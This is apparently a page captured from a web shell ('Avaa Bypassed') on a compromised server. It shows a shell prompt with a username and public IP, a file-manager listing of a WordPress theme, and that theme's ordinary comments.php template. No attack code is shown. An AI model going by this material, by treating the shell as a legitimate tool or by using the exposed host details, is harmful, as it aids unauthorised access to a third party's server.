[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.142.198.108: ~ $
<?php
/**
 * The template for displaying Comments.
 *
 * The area of the page that contains both current comments
 * and the comment form. The actual display of comments is
 * handled by a callback to tutor_comment() which is
 * located in the inc/template-tags.php file.
 *
 * @package Tutor
 */

/*
 * If the current post is protected by a password and
 * the visitor has not yet entered the password we will
 * return early without loading the comments.
 */
if ( post_password_required() )
	return;
?>

	<div id="comments" class="comments-area">

	<?php // You can start editing here -- including this comment! ?>

	<?php if ( have_comments() ) : ?>
		<h2 class="comments-title">
			<?php
			$comments_number = get_comments_number();
			if ( '1' === $comments_number ) {
				/* translators: %s: post title */
				printf( esc_attr( 'One Reply to &ldquo;%s&rdquo;', 'comments title', 'tutor' ), get_the_title() );
			} else {
				printf(
					/* translators: 1: number of comments, 2: post title */
					esc_attr(
						'%1$s Reply to &ldquo;%2$s&rdquo;',
						'%1$s Replies to &ldquo;%2$s&rdquo;',
						$comments_number,
						'comments title',
						'tutor'
					),
					esc_attr(number_format_i18n( $comments_number )),
					get_the_title()
				);
			}
			?>
		</h2>

		<?php the_comments_navigation(); ?>

		<ol class="comment-list">
			<?php
				wp_list_comments( array(
					'style'       => 'ol',
					'short_ping'  => true,
					'avatar_size' => 56,
				) );
			?>
		</ol><!-- .comment-list -->

		<?php the_comments_navigation(); ?>

	<?php endif; // have_comments() ?>

	<?php
		// If comments are closed and there are comments, let's leave a little note, shall we?
		if ( ! comments_open() && '0' != get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) :
	?>
		<p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'tutor' ); ?></p>
	<?php endif; ?>

	<?php comment_form(); ?>

</div><!-- #comments -->

Filemanager

Name Type Size Permission Actions
css Folder 0755
customize-pro Folder 0755
images Folder 0755
inc Folder 0755
js Folder 0755
404.php File 879 B 0644
archive.php File 1.15 KB 0644
change_log.txt File 209 B 0644
comments.php File 1.98 KB 0644
content-page.php File 686 B 0644
content-single.php File 1.46 KB 0644
content.php File 3.84 KB 0644
editor-style.css File 139 B 0644
footer.php File 689 B 0644
front-page.php File 3.27 KB 0644
full-width.php File 947 B 0644
functions.php File 6.16 KB 0644
header.php File 4.18 KB 0644
image.php File 3.97 KB 0644
index.php File 1.58 KB 0644
license.txt File 34.97 KB 0644
no-results.php File 998 B 0644
page.php File 1.03 KB 0644
readme.txt File 3.5 KB 0644
screenshot.png File 267.9 KB 0644
search.php File 1007 B 0644
searchform.php File 540 B 0644
sidebar.php File 822 B 0644
single.php File 909 B 0644
style.css File 16.54 KB 0644